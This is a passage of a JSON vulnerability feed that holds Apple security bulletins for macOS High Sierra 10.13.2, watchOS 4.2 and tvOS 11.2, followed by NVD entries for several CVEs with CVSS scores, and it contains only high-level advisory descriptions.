Zero\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry updated January 5, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017 \n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated January 11, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Mail**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A S/MIME encrypted email may be inadvertently sent unencrypted if the receiver's S/MIME certificate is not installed\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-13871: Lukas Pitschl of GPGTools\n\nEntry updated December 21, 2017\n\n**Mail Drafts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\nEntry updated January 10, 2018\n\n**OpenSSL**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read issue existed in X.509 IPAddressFamily parsing. This issue was addressed with improved bounds checking.\n\nCVE-2017-3735: found by OSS-Fuzz\n\n**Perl**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: This bugs can allow remote attackers to cause a denial of service\n\nDescription: Public CVE-2017-12837 was addressed by updating the function in Perl 5.18\n\nCVE-2017-12837: Jakub Wilk\n\nEntry added October 18, 2018\n\n**Screen Sharing Server**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A user with screen sharing access may be able to access any file readable by root\n\nDescription: A permissions issue existed in the handling of screen sharing sessions. This issue was addressed with improved permissions handling.\n\nCVE-2017-7158: Trevor Jacques of Toronto\n\nEntry updated December 21, 2017\n\n**SIP**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A configuration issue was addressed with additional restrictions.\n\nCVE-2017-13911: Timothy Perfitt of Twocanoes Software\n\nEntry updated August 8, 2018, updated September 25, 2018\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An unprivileged user may change Wi-Fi system parameters leading to denial of service\n\nDescription: An access issue existed with privileged Wi-Fi system configuration. This issue was addressed with additional restrictions.\n\nCVE-2017-13886: David Kreitschmann and Matthias Schulz of Secure Mobile Networking Lab at TU Darmstadt\n\nEntry added May 2, 2018\n\n\n\n## Additional recognition\n\n**Mail**\n\nWe would like to acknowledge Jon Bottarini of HackerOne for their assistance.\n\nEntry added February 6, 2020\n", "edition": 3, "modified": "2020-07-27T08:21:38", "published": "2020-07-27T08:21:38", "id": "APPLE:HT208331", "href": "https://support.apple.com/kb/HT208331", "title": "About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:41:27", "bulletinFamily": "software", "cvelist": ["CVE-2017-13869", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-13080", "CVE-2017-13865", "CVE-2017-13880", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13904", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13868", "CVE-2017-7153", "CVE-2017-13884", "CVE-2017-13867", "CVE-2017-7173", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-13905", "CVE-2017-13862"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 4.2\n\nReleased December 5, 2017\n\n**Auto Unlock**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added January 10, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privilege\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple Watch (1st Generation) and Apple Watch Series 3 \nReleased for Apple Watch Series 1 and Apple Watch Series 2 in [watchOS 4.1](<https://support.apple.com/kb/HT208220>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n\n\n## No impact\n\nwatchOS 4.2 is not impacted by the following issue: \n\n**Kernel**\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n", "edition": 2, "modified": "2018-10-18T06:10:21", "published": "2018-10-18T06:10:21", "id": "APPLE:HT208325", "href": "https://support.apple.com/kb/HT208325", "title": "About the security content of watchOS 4.2 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:22", "bulletinFamily": "software", "cvelist": ["CVE-2017-13869", "CVE-2017-5754", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7151", "CVE-2017-13080", "CVE-2017-13865", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13904", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13870", "CVE-2017-13868", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-13867", "CVE-2017-7173", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-7157", "CVE-2017-13905", "CVE-2017-13885", "CVE-2017-13862", "CVE-2017-7164"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 11.2\n\nReleased December 4, 2017\n\n**App Store**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple TV (4th generation) \nReleased for Apple TV 4K in [tvOS 11.1](<https://support.apple.com/kb/HT208219>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n", "edition": 2, "modified": "2018-10-18T05:56:48", "published": "2018-10-18T05:56:48", "id": "APPLE:HT208327", "href": "https://support.apple.com/kb/HT208327", "title": "About the security content of tvOS 11.2 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T07:36:58", "description": "An issue was discovered in the Comments plugin before 1.5.6 for Craft CMS. There is stored XSS via a guest name.", "edition": 7, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2020-06-05T19:15:00", "title": "CVE-2020-13869", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13869"], "modified": "2020-06-09T13:21:00", "cpe": [], "id": "CVE-2020-13869", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13869", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": 